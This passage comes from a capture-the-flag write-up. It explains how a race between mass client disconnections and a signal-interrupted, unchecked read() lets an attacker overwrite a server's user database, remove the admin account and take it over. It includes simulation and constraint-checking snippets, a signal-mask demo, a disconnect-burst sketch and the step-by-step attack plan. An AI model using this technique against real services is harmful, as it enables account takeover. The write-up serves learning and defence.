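        if not first_read_fails:
            db = server.recv(DB_SIZE, socket.MSG_WAITALL)
        (version,) = struct.unpack("<I", server.recv(4, socket.MSG_WAITALL))
        return db, version
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    first_username = struct.pack("<I", 0x41424344)        # b"DCBA"
    payload = first_username.ljust(DB_SIZE, b"\x00") + struct.pack("<I", 7)
    _, normal_version = writer_view(payload, first_read_fails=False)
    db, raced_version = writer_view(payload, first_read_fails=True)
    print(hex(normal_version), hex(raced_version), db == bytes(DB_SIZE))
```

In the normal case the writer sees the version we appended after the DB. When the first read is lost, the writer keeps its zeroed DB buffer and interprets the first four username bytes as a little-endian version.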

Now remember how the user addition works in register:

The first byte can't be a null byte
We can use any bytes that survive scanf("%s") - this means a heavy restriction on whitespace characters.
The usernames are sorted lexicographically in ascending order

So we are limited in the choice of DB versions we can try, namely the only numbers we can try are:

Not zero in the least significant byte
Don't contain any bytes that correspond to ASCII whitespace
Lexicographically compare less than admin

In our attack, we will keep track of the server's version counter on the client side and create a user whose username is the version counter. If that username would not end up as the first user, or it contains bytes that we can't input, we simply create a dummy user and continue the attack until the server reaches a more suitable version counter.
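The constraints above can be turned into a small check. This is a sketch rather than the actual solve script: the function name and the first_user parameter are hypothetical, and the extra rule about interior null bytes is my own inference from register zeroing the record and copying the name with strncpy, which means every byte after the terminator stays zero.

```python
import struct
from typing import Optional

SCANF_WHITESPACE = b" \t\n\v\f\r"


def version_as_username(version: int, first_user: bytes = b"admin") -> Optional[bytes]:
    """Return the username that encodes `version`, or None if it is unusable."""
    raw = struct.pack("<I", version & 0xFFFFFFFF)      # little-endian, as on x86-64
    name = raw.rstrip(b"\x00")
    if not name:                                       # version 0: empty username
        return None
    if b"\x00" in name:                                # null byte before a non-null byte
        return None
    if any(byte in SCANF_WHITESPACE for byte in name):
        return None                                    # scanf("%64s") would stop here
    if not name < first_user:                          # must sort into slot 0
        return None
    return name


if __name__ == "__main__":
    for candidate in (0x41, 0x0A, 0x100, 0x41424344):
        print(hex(candidate), version_as_username(candidate))
```

Whenever the function returns None for the counter value we are tracking, we burn one version with a dummy registration and check the next one.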

Interrupting read

You may remember we visited a function called setup_sig_blocking at the start of the post. We concluded the purpose of this function is to block all incoming signals, but confirmed that this is not exactly the case. One might wonder what exactly is the case here, and how we can trigger a signal that interrupts read in this case.

Documentation was a bit lacking about signal blocking, but the example kind of leads us in the right direction.

int
main(void)
{
    pthread_t thread;
    sigset_t set;
    int s;

    /* Block SIGQUIT and SIGUSR1; other threads created by main()
       will inherit a copy of the signal mask. */

    sigemptyset(&set);
    sigaddset(&set, SIGQUIT);
    sigaddset(&set, SIGUSR1);
    s = pthread_sigmask(SIG_BLOCK, &set, NULL);
    if (s != 0)
        handle_error_en(s, "pthread_sigmask");

    s = pthread_create(&thread, NULL, &sig_thread, &set);
    if (s != 0)
        handle_error_en(s, "pthread_create");

    /* Main thread carries on to create other threads and/or do
       other work. */

    pause();            /* Dummy pause so we can test program */
}

The example sets up a much smaller set than all signals, then calls the pthread_sigmask function. It also notes that threads created by main will inherit this signal mask.

From this we understand that the signal mask definitely applies to the process/main thread itself, and also that threads created by it inherit the signal mask. Yet, if we check with gdb by setting a breakpoint on the client exit signal handler function (on_client_finish), we see it is hit.

More importantly, we can check which thread we break in, and perhaps surprisingly it's thread 2, corresponding to thread_writer.

So the signal does indeed reach the thread that runs thread_writer. My observation is that the reader and writer threads are started before the signal blocking is set up, so they do not pick up the signal mask retroactively. When a forked client process exits and the signal is sent to the server, it is handled by a thread that isn't blocking it.
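This behaviour can be reproduced outside of the challenge. The sketch below is not the challenge's code. It uses Python's signal.pthread_sigmask wrapper on Linux to compare a thread started before the mask is installed with one started after it. The names mask_inheritance_demo, early and late are made up for illustration.

```python
import signal
import threading


def current_mask():
    # Blocking an empty set changes nothing and returns the caller's mask.
    return signal.pthread_sigmask(signal.SIG_BLOCK, set())


def mask_inheritance_demo():
    """Return the signal masks seen by an 'early' and a 'late' thread."""
    results = {}
    mask_installed = threading.Event()

    def early():
        # Query only after the main thread has changed its own mask.
        mask_installed.wait()
        results["early"] = current_mask()

    def late():
        results["late"] = current_mask()

    # Start from a known state in which SIGCHLD is not blocked.
    old = signal.pthread_sigmask(signal.SIG_UNBLOCK, {signal.SIGCHLD})
    try:
        t_early = threading.Thread(target=early)
        t_early.start()  # created before the mask is installed

        signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGCHLD})
        mask_installed.set()

        t_late = threading.Thread(target=late)
        t_late.start()   # created after the mask is installed

        t_early.join()
        t_late.join()
    finally:
        signal.pthread_sigmask(signal.SIG_SETMASK, old)
    return results
```

Only the late thread reports SIGCHLD as blocked. The early thread keeps the mask it was created with, which matches what gdb showed for thread_writer.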

And so we have a way to try and race for the interruption of the read call through client disconnections.

Putting it all together

Now we have a clear path to exploit the challenge binary:

Connect 64 clients (this is the limit defined by the server)
On separate threads, mass-disconnect 63 clients while one thread registers a user whose name is the current DB version counter
After all threads finish their goal (i.e. disconnecting or registering the user), unregister the user we created for the current DB version counter
Repeat this process for the majority of the 3 minute time limit (because of the alarm)
If we win the race at any point, there will be no admin user at the end of the attack, so try to register it, log in as admin and get the flag.
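The disconnect part of this loop can be sketched as follows. This is only an illustration of the shape of the attack, not the tooling we used: the function name disconnect_burst is made up, the host and port are left to the caller, and the registration thread is omitted because the wire protocol is not reproduced here.

```python
import socket
import threading


def disconnect_burst(host, port, count):
    """Open `count` TCP connections, then close them all at nearly the same time.

    Returns the number of connections that were closed.
    """
    conns = [socket.create_connection((host, port)) for _ in range(count)]
    barrier = threading.Barrier(count)
    closed = []
    lock = threading.Lock()

    def closer(conn):
        # Every closer waits here, so the closes happen as one burst.
        barrier.wait()
        conn.close()
        with lock:
            closed.append(conn)

    threads = [threading.Thread(target=closer, args=(c,)) for c in conns]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(closed)
```

Each closed connection ends one forked client process on the server, which is what produces the signals we are racing with.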

There are some practical aspects to pulling off this attack, where I have to give credit to my teammate gallileo.

My initial attack was a single Python script with multiple threads, which I ran from my own machine against the remote. There are a couple of issues with this:

The race is quite tight, so the way threading and sockets are done in Python might not be fast enough
Attacking from my machine adds quite some latency to the servers, and a co-located server has a better chance.

He wrote a Go script for the simpler disconnect spam, while keeping the original Python script for the more complex logic of the user registration thread. He also wrote a script to automate registering the admin user, logging in and getting the flag.

This was enough for us to solve the challenge and submit the flag, making us one of the 2 teams that solved this task during the competition.

Summary

To summarize, this challenge offers an interesting perspective on attacking concurrency.

In many of the obvious places, concurrency is handled well, with CPU instruction prefixes such as lock, and lockless constructions such as cmpxchg. In other places we saw the use of the pthread mutex and version counters to ensure a globally consistent DB state.

It is interesting that the core issue turns out to be missing error handling rather than a concurrency bug. Had the challenge checked the return value of the read calls, even a successful race to interrupt the read call with a signal would not have led to exploitation.

We have also learnt more about signal handling and specifically pthread_sigmask. In fact, after chatting with the author, it turns out they considered pthread_sigmask a hint/nudge in the right direction, which was required to make the race more winnable/consistent. I mostly experienced it as a source of confusion due to the lack of proper documentation, but in hindsight it is an unusual construct in CTF challenges and should have warranted a closer look.